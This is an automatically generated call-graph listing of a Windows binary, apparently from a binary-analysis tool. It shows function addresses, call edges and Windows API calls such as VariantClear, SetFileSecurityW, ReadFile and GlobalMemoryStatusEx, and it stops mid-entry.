73776->73777 73778 c85289 73776->73778 73779 c85206 73776->73779 73777->73774 73778->73777 73781 c85221 73778->73781 73990 c73097 malloc _CxxThrowException free SysStringLen ctype 73779->73990 73782 c7965d VariantClear 73781->73782 73783 c8522d 73782->73783 73783->73775 73784 c85351 73783->73784 73991 c85459 malloc _CxxThrowException __EH_prolog 73783->73991 73784->73775 73791 c853a1 73784->73791 73996 c735e7 memmove 73784->73996 73786 c852ba 73992 c78011 5 API calls ctype 73786->73992 73789 c852cf 73805 c852fd 73789->73805 73993 c7823d 10 API calls 2 library calls 73789->73993 73791->73775 73997 c743b7 5 API calls 2 library calls 73791->73997 73794 c852e5 73796 c72fec 3 API calls 73794->73796 73795 c853df 73797 c8540e 73795->73797 73802 c8541c 73795->73802 73998 c742e3 CharUpperW 73795->73998 73798 c852f5 73796->73798 73999 c8789c free memmove ctype 73797->73999 73994 c71e40 free 73798->73994 73803 c936ea 5 API calls 73802->73803 73804 c85427 73803->73804 73806 c72fec 3 API calls 73804->73806 73995 c854a0 free ctype 73805->73995 73807 c85433 73806->73807 74000 c71e40 free 73807->74000 73809 c8543b 74001 ca2db9 free ctype 73809->74001 73812 c98b2e 73811->73812 73813 c7965d VariantClear 73812->73813 73814 c8648a 73813->73814 73814->73757 73815 c84d78 73814->73815 74002 c99262 73815->74002 73819 c85bf4 __EH_prolog 73818->73819 74009 c854c0 73819->74009 73822 c85e17 73822->73757 73823 c98b05 VariantClear 73824 c85c34 73823->73824 73824->73822 74024 c85630 73824->74024 73827 c936ea 5 API calls 73828 c85c51 73827->73828 73829 c85c60 73828->73829 74129 c857c1 53 API calls 2 library calls 73828->74129 73831 c72f1c 2 API calls 73829->73831 73832 c85c6c 73831->73832 73836 c85caa 73832->73836 74130 c86217 4 API calls 2 library calls 73832->74130 73834 c85c91 73835 c72fec 3 API calls 73834->73835 73837 c85c9e 73835->73837 73838 c85d49 73836->73838 73842 c72e04 2 API calls 73836->73842 74131 c71e40 free 73837->74131 73840 c85d91 73838->73840 73841 c85d55 73838->73841 73849 c85da6 73840->73849 74045 c858be 73840->74045 73843 c72fec 3 API calls 73841->73843 73845 c85cd2 73842->73845 73844 c85d66 73843->73844 73848 c85d73 73844->73848 74137 c75b2d 11 API calls 2 library calls 73844->74137 74132 c71e40 free 73845->74132 73847 c72fec 3 API calls 73850 c85dd1 73847->73850 73848->73849 73852 c85d7b 73848->73852 73849->73847 73853 c85d8c 73849->73853 73850->73853 73855 c85de7 73850->73855 73867 c85e41 73850->73867 73852->73853 74138 c87140 73852->74138 74162 c71e40 free 73853->74162 74142 c86b5e 69 API calls 2 library calls 73855->74142 73858 c85cf5 73858->73838 73862 c72fec 3 API calls 73858->73862 73859 c85eb0 73861 c861fa 74163 c71e40 free 73861->74163 73866 c85d0c 73862->73866 74133 c71089 malloc _CxxThrowException free _CxxThrowException 73866->74133 73867->73859 74145 c84115 VariantClear _CxxThrowException __EH_prolog 73867->74145 73928 c85110 9 API calls 73928->73743 73929->73743 73930->73740 73932 c936f4 __EH_prolog 73931->73932 73933 c72e04 2 API calls 73932->73933 73934 c9370a 73933->73934 73935 c93736 73934->73935 74246 c71089 malloc _CxxThrowException free _CxxThrowException 73934->74246 74247 c731e5 malloc _CxxThrowException free _CxxThrowException 73934->74247 73936 c72f1c 2 API calls 73935->73936 73938 c93742 73936->73938 74245 c71e40 free 73938->74245 73941 c86633 73941->73751 73941->73754 73942 c71089 malloc _CxxThrowException free _CxxThrowException 73941->73942 73942->73754 73943->73751 73944->73757 73946 c98fae __EH_prolog 73945->73946 73947 c97ebb free 73946->73947 73948 c98ff2 73947->73948 73979 c98b64 73948->73979 73952 c99020 73953 c72fec 3 API calls 73952->73953 73967 c86302 73952->73967 73954 c9903a 73953->73954 73966 c9904d 73954->73966 73983 c98b80 VariantClear 73954->73983 73956 c99144 73961 c72f88 3 API calls 73956->73961 73964 c9917b 73956->73964 73957 c991b0 73986 c98b9c 10 API calls 2 library calls 73957->73986 73958 c99244 73988 c743b7 5 API calls 2 library calls 73958->73988 73961->73964 73962 c991c0 73962->73967 73972 c72f88 3 API calls 73962->73972 73963 c99100 73965 c7965d VariantClear 73963->73965 73964->73957 73964->73958 73965->73967 73966->73956 73966->73963 73966->73967 73969 c990d6 73966->73969 73984 c73097 malloc _CxxThrowException free SysStringLen ctype 73966->73984 73967->73728 73967->73729 73967->73757 73969->73963 73970 c990e7 73969->73970 73985 c98f2e 9 API calls 73969->73985 73974 c7965d VariantClear 73970->73974 73977 c991ff 73972->73977 73973 c99112 73973->73963 73975 c98b64 VariantClear 73973->73975 73974->73956 73976 c99123 73975->73976 73976->73963 73976->73970 73977->73967 73987 c750ff free ctype 73977->73987 73980 c98b05 VariantClear 73979->73980 73981 c98b6f 73980->73981 73981->73967 73982 c98f2e 9 API calls 73981->73982 73982->73952 73983->73966 73984->73969 73985->73973 73986->73962 73987->73967 73988->73967 73989->73771 73990->73781 73991->73786 73992->73789 73993->73794 73994->73805 73995->73784 73996->73784 73997->73795 73998->73795 73999->73802 74000->73809 74001->73775 74003 c9926c __EH_prolog 74002->74003 74004 c992a4 74003->74004 74005 c992fc 74003->74005 74007 c7965d VariantClear 74004->74007 74006 c7965d VariantClear 74005->74006 74008 c84d91 74006->74008 74007->74008 74008->73743 74008->73757 74008->73928 74010 c854ca __EH_prolog 74009->74010 74012 c7965d VariantClear 74010->74012 74014 c85507 74010->74014 74011 c7965d VariantClear 74013 c85567 74011->74013 74015 c85528 74012->74015 74013->73822 74013->73823 74014->74011 74015->74014 74016 c85572 74015->74016 74017 c7965d VariantClear 74016->74017 74018 c8558e 74017->74018 74164 c84cac VariantClear __EH_prolog 74018->74164 74020 c855a1 74020->74013 74165 c84cac VariantClear __EH_prolog 74020->74165 74022 c855b8 74022->74013 74166 c84cac VariantClear __EH_prolog 74022->74166 74025 c8563a __EH_prolog 74024->74025 74027 c85679 74025->74027 74167 c93558 10 API calls 2 library calls 74025->74167 74028 c72f1c 2 API calls 74027->74028 74044 c8571a 74027->74044 74029 c85696 74028->74029 74168 c93333 malloc _CxxThrowException free 74029->74168 74031 c856a2 74032 c856ad 74031->74032 74033 c856c5 74031->74033 74169 c87853 5 API calls 2 library calls 74032->74169 74038 c856b4 74033->74038 74170 c74adf wcscmp 74033->74170 74036 c85707 74173 c731e5 malloc _CxxThrowException free _CxxThrowException 74036->74173 74038->74036 74172 c71089 malloc _CxxThrowException free _CxxThrowException 74038->74172 74039 c856d2 74039->74038 74171 c87853 5 API calls 2 library calls 74039->74171 74041 c85712 74174 c71e40 free 74041->74174 74044->73827 74046 c858c8 __EH_prolog 74045->74046 74047 c72e04 2 API calls 74046->74047 74048 c858e9 74047->74048 74049 c76c72 44 API calls 74048->74049 74129->73829 74130->73834 74131->73836 74132->73858 74137->73848 74162->73861 74163->73822 74164->74020 74165->74022 74166->74013 74167->74027 74168->74031 74169->74038 74170->74039 74171->74038 74172->74036 74173->74041 74174->74044 74245->73941 74246->73934 74247->73934 74249 c8719a __EH_prolog 74248->74249 74250 c871b0 74249->74250 74254 c871dd 74249->74254 74251 c84d78 VariantClear 74250->74251 74253 c871b7 74251->74253 74253->73703 74261 c86fc5 74254->74261 74255 c872b4 74256 c84d78 VariantClear 74255->74256 74257 c872c0 74255->74257 74256->74257 74257->74253 74258 c87140 7 API calls 74257->74258 74258->74253 74259 c87236 74259->74253 74259->74255 74260 c872a3 SetFileSecurityW 74259->74260 74260->74255 74262 c86fcf __EH_prolog 74261->74262 74287 c844a6 74262->74287 74267 c8709e 74314 c71e40 free 74267->74314 74269 c87029 74271 c8706a 74269->74271 74309 c84dff 7 API calls 2 library calls 74269->74309 74270 c87051 74270->74271 74275 c811b4 107 API calls 74270->74275 74290 c868ac 74271->74290 74274 c870c0 74310 c76096 15 API calls 2 library calls 74274->74310 74275->74271 74276 c8712e 74276->74259 74278 c870d1 74279 c870e2 74278->74279 74311 c84dff 7 API calls 2 library calls 74278->74311 74283 c870e6 74279->74283 74312 c86b5e 69 API calls 2 library calls 74279->74312 74282 c870fd 74282->74283 74284 c87103 74282->74284 74283->74267 74313 c71e40 free 74284->74313 74286 c8710b 74286->74276 74288 c72e04 2 API calls 74287->74288 74289 c844be 74288->74289 74289->74269 74289->74271 74308 c86e71 12 API calls 2 library calls 74289->74308 74291 c868b6 __EH_prolog 74290->74291 74292 c77d4b 6 API calls 74291->74292 74293 c86921 74291->74293 74305 c868c5 74291->74305 74296 c86906 74292->74296 74294 c86962 74293->74294 74298 c86998 74293->74298 74317 c86a17 6 API calls 2 library calls 74293->74317 74294->74298 74318 c72dcd malloc _CxxThrowException 74294->74318 74296->74293 74316 c84dff 7 API calls 2 library calls 74296->74316 74297 c869e1 74321 c7bcf8 CloseHandle 74297->74321 74298->74297 74315 c77c3b SetFileTime 74298->74315 74300 c8697a 74319 c86b09 13 API calls __EH_prolog 74300->74319 74305->74267 74305->74274 74306 c8698c 74320 c71e40 free 74306->74320 74308->74269 74309->74270 74310->74278 74311->74279 74312->74282 74313->74286 74314->74276 74315->74297 74316->74293 74317->74294 74318->74300 74319->74306 74320->74298 74321->74305 74322 cb0343 74327 cb035f 74322->74327 74325 cb0358 74328 cb0369 __EH_prolog 74327->74328 74344 c8139e 74328->74344 74336 cb03a2 74361 c71e40 free 74336->74361 74338 cb03aa 74362 cb03d8 74338->74362 74343 c71e40 free 74343->74325 74345 c813ae 74344->74345 74346 c813b3 74344->74346 74378 d07ea0 SetEvent GetLastError 74345->74378 74348 cb01c4 74346->74348 74351 cb01ce __EH_prolog 74348->74351 74349 cb0203 74379 c71e40 free 74349->74379 74351->74349 74380 c71e40 free 74351->74380 74352 cb020b 74354 cb0143 74352->74354 74355 cb014d __EH_prolog 74354->74355 74358 cb0182 74355->74358 74382 c71e40 free 74355->74382 74357 cb018a 74360 c71e40 free 74357->74360 74381 c71e40 free 74358->74381 74360->74336 74361->74338 74363 cb03e2 __EH_prolog 74362->74363 74364 c8139e ctype 2 API calls 74363->74364 74365 cb03fb 74364->74365 74383 d07d50 74365->74383 74367 cb0403 74368 d07d50 ctype 2 API calls 74367->74368 74369 cb040b 74368->74369 74370 d07d50 ctype 2 API calls 74369->74370 74371 cb03b7 74370->74371 74372 cb004a 74371->74372 74373 cb0054 __EH_prolog 74372->74373 74389 c71e40 free 74373->74389 74375 cb0067 74390 c71e40 free 74375->74390 74377 cb006f 74377->74325 74377->74343 74378->74346 74379->74352 74380->74351 74381->74357 74382->74355 74384 d07d59 CloseHandle 74383->74384 74385 d07d7b 74383->74385 74386 d07d64 GetLastError 74384->74386 74387 d07d75 74384->74387 74385->74367 74386->74385 74388 d07d6e 74386->74388 74387->74385 74388->74367 74389->74375 74390->74377 74391 cf6bc6 74392 cf6bcd 74391->74392 74394 cf6bca 74391->74394 74393 cf6bd1 malloc 74392->74393 74392->74394 74393->74394 74395 c9d3c2 74396 c9d3e9 74395->74396 74397 c7965d VariantClear 74396->74397 74398 c9d42a 74397->74398 74399 c9d883 2 API calls 74398->74399 74400 c9d4b1 74399->74400 74486 c98d4a 74400->74486 74403 c98b05 VariantClear 74406 c9d4e3 74403->74406 74503 c92a72 74406->74503 74407 c72fec 3 API calls 74408 c9d594 74407->74408 74409 c9d5cd 74408->74409 74410 c9d742 74408->74410 74412 c9d7d9 74409->74412 74507 c99317 74409->74507 74534 c9cd49 malloc _CxxThrowException free 74410->74534 74537 c71e40 free 74412->74537 74413 c9d754 74417 c72fec 3 API calls 74413->74417 74420 c9d763 74417->74420 74418 c9d7e1 74538 c71e40 free 74418->74538 74419 c9d5f1 74422 cb04d2 5 API calls 74419->74422 74535 c71e40 free 74420->74535 74425 c9d5f9 74422->74425 74424 c9d7e9 74427 c9326b free 74424->74427 74513 c9e332 74425->74513 74426 c9d76b 74536 c71e40 free 74426->74536 74435 c9d69a 74427->74435 74431 c9d773 74433 c9326b free 74431->74433 74433->74435 74434 c9d610 74520 c71e40 free 74434->74520 74437 c9d618 74521 c9326b 74437->74521 74439 c9d2a8 74439->74435 74461 c9d883 74439->74461 74442 c72fec 3 API calls 74462 c9d88d __EH_prolog 74461->74462 74463 c72e04 2 API calls 74462->74463 74464 c9d8c6 74463->74464 74465 c72e04 2 API calls 74464->74465 74466 c9d8d2 74465->74466 74467 c72e04 2 API calls 74466->74467 74468 c9d8de 74467->74468 74539 c92b63 74468->74539 74471 c92b63 2 API calls 74472 c9d34f 74471->74472 74472->74442 74487 c98d54 __EH_prolog 74486->74487 74501 c98da4 74487->74501 74547 c72b55 malloc _CxxThrowException free _CxxThrowException ctype 74487->74547 74488 c98e09 74490 c7965d VariantClear 74488->74490 74489 c98e15 74491 c98e2d 74489->74491 74492 c98e5e 74489->74492 74495 c98e21 74489->74495 74494 c98e11 74490->74494 74491->74492 74493 c98e2b 74491->74493 74496 c7965d VariantClear 74492->74496 74498 c7965d VariantClear 74493->74498 74494->74403 74548 c73097 malloc _CxxThrowException free SysStringLen ctype 74495->74548 74496->74494 74500 c98e47 74498->74500 74500->74494 74549 c98e7c 6 API calls __EH_prolog 74500->74549 74501->74488 74501->74489 74501->74494 74504 c92a82 74503->74504 74505 c72e04 2 API calls 74504->74505 74506 c92a9f 74505->74506 74506->74407 74511 c99321 __EH_prolog 74507->74511 74508 c99360 74509 c7965d VariantClear 74508->74509 74510 c993d0 74509->74510 74510->74412 74510->74419 74511->74508 74550 c79686 VariantClear 74511->74550 74514 c9e33c __EH_prolog 74513->74514 74515 c71e0c ctype 2 API calls 74514->74515 74516 c9e34a 74515->74516 74517 c9d608 74516->74517 74551 c9e3d1 malloc _CxxThrowException __EH_prolog 74516->74551 74519 c71e40 free 74517->74519 74519->74434 74520->74437 74522 c93275 __EH_prolog 74521->74522 74552 c92c0b 74522->74552 74525 c92c0b ctype free 74526 c93296 74525->74526 74557 c71e40 free 74526->74557 74528 c9329e 74558 c71e40 free 74528->74558 74530 c932a6 74559 c71e40 free 74530->74559 74532 c932ae 74532->74439 74534->74413 74535->74426 74536->74431 74537->74418 74538->74424 74540 c92b6d __EH_prolog 74539->74540 74541 c72e04 2 API calls 74540->74541 74542 c92b9a 74541->74542 74543 c72e04 2 API calls 74542->74543 74544 c92ba5 74543->74544 74544->74471 74547->74501 74548->74493 74549->74494 74550->74508 74551->74517 74560 c71e40 free 74552->74560 74554 c92c16 74561 c71e40 free 74554->74561 74556 c92c1e 74556->74525 74557->74528 74558->74530 74559->74532 74560->74554 74561->74556 74562 c9a7c5 74570 c9a96b 74562->74570 74580 c9a7e9 74562->74580 74563 c9ade3 74667 c71e40 free 74563->74667 74564 c9a952 74564->74570 74648 c9e0b0 6 API calls 74564->74648 74566 c9adeb 74668 c71e40 free 74566->74668 74570->74563 74572 c9ac1e 74570->74572 74596 c9ac6c 74570->74596 74609 c9ad88 74570->74609 74613 c9ad17 74570->74613 74615 c9acbc 74570->74615 74629 c8101c 74570->74629 74632 c998f2 74570->74632 74638 c9cc6f 74570->74638 74649 c99531 5 API calls __EH_prolog 74570->74649 74650 c980c1 malloc _CxxThrowException __EH_prolog 74570->74650 74651 c9c820 5 API calls 2 library calls 74570->74651 74652 c9814d 6 API calls 74570->74652 74653 c98125 free ctype 74570->74653 74571 c9ae99 74574 c71e0c ctype 2 API calls 74571->74574 74654 c71e40 free 74572->74654 74573 cb04d2 malloc _CxxThrowException free _CxxThrowException memcpy 74577 c9adf3 74573->74577 74578 c9aea9 memset memset 74574->74578 74577->74571 74577->74573 74581 c9aedd 74578->74581 74579 c9ac26 74655 c71e40 free 74579->74655 74580->74564 74589 cb04d2 5 API calls 74580->74589 74647 c9e0b0 6 API calls 74580->74647 74669 c71e40 free 74581->74669 74586 c9aee5 74670 c71e40 free 74586->74670 74588 c9aef0 74671 c71e40 free 74588->74671 74589->74580 74592 c9ac2e 74672 c71e40 free 74592->74672 74594 c9c430 74673 c71e40 free 74594->74673 74656 c71e40 free 74596->74656 74597 c9c438 74674 c71e40 free 74597->74674 74599 c9c443 74675 c71e40 free 74599->74675 74602 c9ac85 74657 c71e40 free 74602->74657 74605 c9c44e 74676 c71e40 free 74605->74676 74607 c9c459 74664 c98125 free ctype 74609->74664 74661 c98125 free ctype 74613->74661 74614 c9ad93 74665 c71e40 free 74614->74665 74658 c98125 free ctype 74615->74658 74619 c9adac 74666 c71e40 free 74619->74666 74620 c9acc7 74659 c71e40 free 74620->74659 74621 c9ad3c 74662 c71e40 free 74621->74662 74625 c9ace0 74660 c71e40 free 74625->74660 74626 c9ad55 74663 c71e40 free 74626->74663 74677 c7b95a 74629->74677 74633 c998fc __EH_prolog 74632->74633 74684 c99987 74633->74684 74635 c99970 74635->74570 74636 c99911 74636->74635 74688 c9ef8d 12 API calls 2 library calls 74636->74688 74728 cb5505 74638->74728 74732 cbf445 74638->74732 74738 cbcf91 74638->74738 74639 c9cc8b 74643 c9cccb 74639->74643 74746 c9979e VariantClear __EH_prolog 74639->74746 74641 c9ccb1 74641->74643 74747 c9cae9 VariantClear 74641->74747 74643->74570 74647->74580 74648->74570 74649->74570 74650->74570 74651->74570 74652->74570 74653->74570 74654->74579 74655->74592 74656->74602 74657->74592 74658->74620 74659->74625 74660->74592 74661->74621 74662->74626 74663->74592 74664->74614 74665->74619 74666->74592 74667->74566 74668->74577 74669->74586 74670->74588 74671->74592 74672->74594 74673->74597 74674->74599 74675->74605 74676->74607 74678 c7b969 74677->74678 74679 c7b97d 74677->74679 74678->74679 74680 c77731 5 API calls 74678->74680 74679->74570 74681 c7b9ee 74680->74681 74681->74679 74683 c7b8ec GetLastError 74681->74683 74683->74679 74685 c99991 __EH_prolog 74684->74685 74689 cc80aa 74685->74689 74686 c999a8 74686->74636 74688->74635 74690 cc80b4 __EH_prolog 74689->74690 74691 c71e0c ctype 2 API calls 74690->74691 74692 cc80bf 74691->74692 74693 cc80d3 74692->74693 74695 cbbdb5 74692->74695 74693->74686 74696 cbbdbf __EH_prolog 74695->74696 74701 cbbe69 74696->74701 74698 cbbdef 74699 c72e04 2 API calls 74698->74699 74700 cbbe16 74699->74700 74700->74693 74702 cbbe73 __EH_prolog 74701->74702 74705 cb5e2b 74702->74705 74704 cbbe7f 74704->74698 74706 cb5e35 __EH_prolog 74705->74706 74711 cb08b6 74706->74711 74708 cb5e41 74716 c8dfc9 malloc _CxxThrowException __EH_prolog 74708->74716 74710 cb5e57 74710->74704 74717 c79c60 74711->74717 74713 cb08c4 74722 c79c8f GetModuleHandleA GetProcAddress 74713->74722 74715 cb08f3 __aulldiv 74715->74708 74716->74710 74727 c79c4d GetCurrentProcess GetProcessAffinityMask 74717->74727 74719 c79c6e 74720 c79c80 GetSystemInfo 74719->74720 74721 c79c79 74719->74721 74720->74713 74721->74713 74723 c79cc4 GlobalMemoryStatusEx 74722->74723 74724 c79cef GlobalMemoryStatus 74722->74724 74723->74724 74726 c79cce 74723->74726 74725 c79d08 74724->74725 74725->74726 74726->74715 74727->74719 74729 cb550f __EH_prolog 74728->74729 74748 cb4e8a 74729->74748 74733 cbf455 74732->74733 74971 c81092 74733->74971 74737 cbf478 74737->74639 74739 cbcf9b __EH_prolog 74738->74739 74740 cbf445 14 API calls 74739->74740 74741 cbd018 74740->74741 74745 cbd01f 74741->74745 75023 cc1511 74741->75023 74743 cbd08b 74743->74745 75029 cc2c5d 11 API calls 2 library calls 74743->75029 74745->74639 74746->74641 74747->74643 74749 cb4e94 __EH_prolog 74748->74749 74750 c72e04 2 API calls 74749->74750 74766 cb4f1d 74749->74766 74751 cb4ed7 74750->74751 74880 c87fc5 74751->74880 74753 cb4f0a 74757 c7965d VariantClear 74753->74757 74754 cb4f37 74755 cb4f63 74754->74755 74756 cb4f41 74754->74756 74759 c72f88 3 API calls 74755->74759 74758 c7965d VariantClear 74756->74758 74760 cb4f15 74757->74760 74761 cb4f4c 74758->74761 74762 cb4f71 74759->74762 74901 c71e40 free 74760->74901 74902 c71e40 free 74761->74902 74765 c7965d VariantClear 74762->74765 74767 cb4f80 74765->74767 74766->74639 74903 c85bcf malloc _CxxThrowException 74767->74903 74769 cb4f9a 74770 c72e47 2 API calls 74769->74770 74771 cb4fad 74770->74771 74772 c72f1c 2 API calls 74771->74772 74773 cb4fbd 74772->74773 74774 c72e04 2 API calls 74773->74774 74775 cb4fd1 74774->74775 74776 c72e04 2 API calls 74775->74776 74782 cb4fdd 74776->74782 74777 cb5404 74948 c71e40 free 74777->74948 74779 cb540c 74949 c71e40 free 74779->74949 74781 cb5414 74950 c71e40 free 74781->74950 74782->74777 74904 c85bcf malloc _CxxThrowException 74782->74904 74785 cb5099 74787 c72da9 2 API calls 74785->74787 74786 cb541c 74951 c71e40 free 74786->74951 74789 cb50a9 74787->74789 74791 c72fec 3 API calls 74789->74791 74790 cb5424 74952 c71e40 free 74790->74952 74793 cb50b6 74791->74793 74905 c71e40 free 74793->74905 74794 cb542c 74953 c71e40 free 74794->74953 74797 cb50be 74906 c71e40 free 74797->74906 74799 cb50cd 74800 c72f88 3 API calls 74799->74800 74801 cb50e3 74800->74801 74802 cb50f1 74801->74802 74803 cb5100 74801->74803 74907 c730ea 74802->74907 74913 c73044 malloc _CxxThrowException free ctype 74803->74913 74806 cb50fe 74914 c81029 6 API calls 74806->74914 74808 cb511a 74809 cb516b 74808->74809 74810 cb5120 74808->74810 74921 c8089e malloc _CxxThrowException free _CxxThrowException memcpy 74809->74921 74915 c71e40 free 74810->74915 74813 cb5187 74817 cb04d2 5 API calls 74813->74817 74814 cb5128 74916 c71e40 free 74814->74916 74816 cb5130 74917 c71e40 free 74816->74917 74819 cb51ba 74817->74819 74922 cb0516 malloc _CxxThrowException ctype 74819->74922 74820 cb5138 74918 c71e40 free 74820->74918 74823 cb51c5 74827 cb522d 74823->74827 74828 cb51f5 74823->74828 74824 cb5140 74919 c71e40 free 74824->74919 74826 cb5148 74920 c71e40 free 74826->74920 74830 c72e04 2 API calls 74827->74830 74923 c71e40 free 74828->74923 74877 cb5235 74830->74877 74832 cb51fd 74924 c71e40 free 74832->74924 74835 cb5205 74925 c71e40 free 74835->74925 74836 cb532e 74934 c71e40 free 74836->74934 74839 cb520d 74926 c71e40 free 74839->74926 74840 cb5347 74840->74777 74842 cb5358 74840->74842 74935 c71e40 free 74842->74935 74843 cb5215 74927 c71e40 free 74843->74927 74845 cb53a3 74941 c71e40 free 74845->74941 74847 cb5360 74936 c71e40 free 74847->74936 74848 cb521d 74928 c71e40 free 74848->74928 74852 cb5368 74937 c71e40 free 74852->74937 74855 cb53bc 74942 c71e40 free 74855->74942 74860 cb53c4 74943 c71e40 free 74860->74943 74861 cb04d2 5 API calls 74861->74877 74865 cb53cc 74944 c71e40 free 74865->74944 74870 cb53d4 74877->74836 74877->74845 74877->74861 74878 c72e04 2 API calls 74877->74878 74929 cb545c 5 API calls 2 library calls 74877->74929 74930 c81029 6 API calls 74877->74930 74931 c8089e malloc _CxxThrowException free _CxxThrowException memcpy 74877->74931 74932 cb0516 malloc _CxxThrowException ctype 74877->74932 74933 c71e40 free 74877->74933 74878->74877 74881 c87fcf __EH_prolog 74880->74881 74883 c88061 74881->74883 74885 c8805c 74881->74885 74886 c88019 74881->74886 74890 c87ff4 74881->74890 74882 c8800a 74963 c79736 VariantClear 74882->74963 74883->74885 74898 c88025 74883->74898 74962 c79630 VariantClear 74885->74962 74889 c8801e 74886->74889 74886->74890 74887 c880b8 74891 c7965d VariantClear 74887->74891 74892 c88042 74889->74892 74893 c88022 74889->74893 74890->74882 74954 c7950d 74890->74954 74895 c880c0 74891->74895 74960 c79597 VariantClear 74892->74960 74896 c88032 74893->74896 74893->74898 74895->74753 74895->74754 74959 c79604 VariantClear 74896->74959 74898->74882 74961 c795df VariantClear 74898->74961 74901->74766 74902->74766 74903->74769 74904->74785 74905->74797 74906->74799 74908 c730fd 74907->74908 74909 c7311d 74908->74909 74910 c71e0c ctype 2 API calls 74908->74910 74909->74806 74911 c73113 74910->74911 74970 c71e40 free 74911->74970 74913->74806 74914->74808 74915->74814 74916->74816 74917->74820 74918->74824 74919->74826 74920->74766 74921->74813 74922->74823 74923->74832 74924->74835 74925->74839 74926->74843 74927->74848 74928->74766 74929->74877 74930->74877 74931->74877 74932->74877 74933->74877 74934->74840 74935->74847 74936->74852 74941->74855 74942->74860 74943->74865 74944->74870 74948->74779 74949->74781 74950->74786 74951->74790 74952->74794 74953->74766 74964 c79767 74954->74964 74956 c79518 SysAllocStringLen 74957 c7954f 74956->74957 74958 c79539 _CxxThrowException 74956->74958 74957->74882 74958->74957 74959->74882 74960->74882 74961->74882 74962->74882 74963->74887 74965 c79770 74964->74965 74966 c79779 74964->74966 74965->74956 74969 c79686 VariantClear 74966->74969 74968 c79780 74968->74956 74969->74968 74970->74909 74973 c7b95a 6 API calls 74971->74973 74972 c810aa 74972->74737 74974 cbf1b2 74972->74974 74973->74972 74975 cbf1bc __EH_prolog 74974->74975 74984 c81168 74975->74984 74977 cbf1d3 74978 cbf21c _CxxThrowException 74977->74978 74979 cbf231 memcpy 74977->74979 74980 cbf1e6 74977->74980 74978->74979 74982 cbf24c 74979->74982 74980->74737 74981 cbf2f0 memmove 74981->74982 74982->74980 74982->74981 74983 cbf31a memcpy 74982->74983 74983->74980 74987 c8111c 74984->74987 74988 c81130 74987->74988 74989 c8115f 74988->74989 74992 c7b668 74988->74992 75011 c7d331 74988->75011 74989->74977 74999 c7b675 74992->74999 74993 c7b864 75015 c77b7c 74993->75015 74996 c7b8aa GetLastError 74997 c7b6aa 74996->74997 74997->74988 74998 c7b81b 74998->74997 75002 c7b839 memcpy 74998->75002 74999->74993 74999->74997 74999->74998 75000 c77731 5 API calls 74999->75000 75001 c7b7e7 74999->75001 75003 c7b811 74999->75003 75005 c7b7ad 74999->75005 75020 c77b4f ReadFile 74999->75020 75000->74999 75001->74993 75004 c77731 5 API calls 75001->75004 75002->74997 75021 c7b8ec GetLastError 75003->75021 75006 c7b80d 75004->75006 75005->74999 75010 c7b8c7 75005->75010 75019 cf6a20 VirtualAlloc 75005->75019 75006->74993 75006->75003 75010->74997 75013 c7d355 75011->75013 75012 c7d374 75012->74988 75013->75012 75014 c7b668 10 API calls 75013->75014 75014->75012 75016 c77b89 75015->75016 75022 c77b4f ReadFile 75016->75022 75018 c77b9a 75018->74996 75018->74997 75019->75005 75020->74999 75021->74997 75022->75018 75024 cc151b __EH_prolog 75023->75024 75030 cc10d3 75024->75030 75027 cc1589 75027->74743 75028 cc1552 _CxxThrowException 75028->74743 75028->75027 75029->74745 75031 cc10dd __EH_prolog 75030->75031 75062 cbd1b7 75031->75062 75033 cc12ef 75033->75027 75033->75028 75034 cc11f4 75034->75033 75061 c7b95a 6 API calls 75034->75061 75035 cc139e 75035->75033 75036 cc13c4 75035->75036 75038 c71e0c ctype 2 API calls 75035->75038 75039 c81168 10 API calls 75036->75039 75038->75036 75043 cc13da 75039->75043 75040 c81168 10 API calls 75040->75034 75041 cc13de 75110 c71e40 free 75041->75110 75043->75041 75045 cc13f9 75043->75045 75104 cbef67 _CxxThrowException 75043->75104 75069 cbf047 75045->75069 75048 cc14ba 75108 cc0943 50 API calls 2 library calls 75048->75108 75050 cc1450 75073 cc06ae 75050->75073 75052 cc14e7 75109 ca2db9 free ctype 75052->75109 75061->75035 75111 cbd23c 75062->75111 75064 cbd1ed 75118 c71e40 free 75064->75118 75066 cbd209 75119 c71e40 free 75066->75119 75068 cbd21c 75068->75033 75068->75034 75068->75040 75070 cbf063 75069->75070 75071 cbf072 75070->75071 75147 cbef67 _CxxThrowException 75070->75147 75071->75048 75071->75050 75105 cbef67 _CxxThrowException 75071->75105 75074 cc06b8 __EH_prolog 75073->75074 75148 cc03f4 75074->75148 75079 cc08e3 _CxxThrowException 75081 cc08f7 75079->75081 75086 cbb8dc ctype free 75081->75086 75084 c7429a 3 API calls 75087 cc0715 75084->75087 75089 cc0914 75086->75089 75087->75079 75087->75081 75087->75084 75090 c71e0c ctype 2 API calls 75087->75090 75102 cc0877 75087->75102 75103 cbef67 _CxxThrowException 75087->75103 75178 c812a5 75087->75178 75183 cb81ec 75087->75183 75279 c71e40 free 75089->75279 75090->75087 75094 cc091c 75280 c71e40 free 75094->75280 75096 cc0924 75269 cbb8dc 75102->75269 75103->75087 75104->75045 75105->75050 75108->75052 75109->75041 75110->75033 75120 cbd2b8 75111->75120 75114 cbd25e 75137 c71e40 free 75114->75137 75117 cbd275 75117->75064 75118->75066 75119->75068 75139 c71e40 free 75120->75139 75122 cbd2c8 75140 c71e40 free 75122->75140 75124 cbd2dc 75141 c71e40 free 75124->75141 75126 cbd2e7 75142 c71e40 free 75126->75142 75128 cbd2f2 75143 c71e40 free 75128->75143 75130 cbd2fd 75144 c71e40 free 75130->75144 75132 cbd308 75145 c71e40 free 75132->75145 75134 cbd313 75135 cbd246 75134->75135 75146 c71e40 free 75134->75146 75135->75114 75138 c71e40 free 75135->75138 75137->75117 75138->75114 75139->75122 75140->75124 75141->75126 75142->75128 75143->75130 75144->75132 75145->75134 75146->75135 75147->75071 75149 cbf047 _CxxThrowException 75148->75149 75150 cc0407 75149->75150 75152 cbf047 _CxxThrowException 75150->75152 75153 cc0475 75150->75153 75151 cc04b8 75155 cc04e8 75151->75155 75158 cc04cd 75151->75158 75163 cc0421 75152->75163 75154 cc049a 75153->75154 75286 cbfa3f 22 API calls 2 library calls 75153->75286 75154->75151 75287 cc159a malloc _CxxThrowException free ctype 75154->75287 75289 cc7c4a malloc _CxxThrowException free ctype 75155->75289 75288 cbfff0 9 API calls 2 library calls 75158->75288 75159 cc043e 75284 cbf93c 7 API calls 2 library calls 75159->75284 75161 cc0492 75164 cbf047 _CxxThrowException 75161->75164 75163->75159 75283 cbef67 _CxxThrowException 75163->75283 75164->75154 75166 cc0446 75170 cc046d 75166->75170 75285 